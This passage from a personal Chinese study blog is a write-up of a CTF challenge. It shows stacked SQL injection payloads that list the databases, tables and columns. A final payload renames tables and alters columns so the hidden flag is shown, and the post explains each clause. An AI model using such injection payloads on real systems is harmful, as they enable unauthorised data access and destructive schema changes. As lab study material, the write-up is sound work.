乐呵呵、欢的博客

lehhair's Blog

学习-230419

2023-04-19

buctf-[强网杯 2019]随便注

0'; show databases; #
0'; show tables; #
1'; show columns from words; #
0'; show columns from `1919810931114514 `; #
1';rename table words to a;rename table `1919810931114514` to words;alter table words change flag data varchar(50);alter table words add id int unsigned not Null auto_increment primary key;
  • 1':这个子句没有任何意义,它只是一个数字后面跟着一个单引号,可能是一个错误或者一个注入攻击的尝试。
  • rename table words to a:这个子句用于重命名一个表,它将表words重命名为a。rename table是MySQL特有的语法,其他数据库可能不支持。
  • rename table 1919810931114514 to words:这个子句也用于重命名一个表,它将表1919810931114514重命名为words。注意这里使用了反引号(`)来包围表名,因为表名是一个数字,如果不加反引号,会被当作一个数值而报错。
  • alter table words change flag data varchar(50):这个子句用于修改一个表的结构,它将表words中的flag列改名为data,并且将其数据类型改为varchar(50)。change是MySQL特有的关键字,其他数据库可能不支持。
  • alter table words add id int unsigned not Null auto_increment primary key:这个子句也用于修改一个表的结构,它在表words中添加了一个名为id的列,并且指定了其数据类型为int unsigned not Null auto_increment primary key。这意味着这个列是一个无符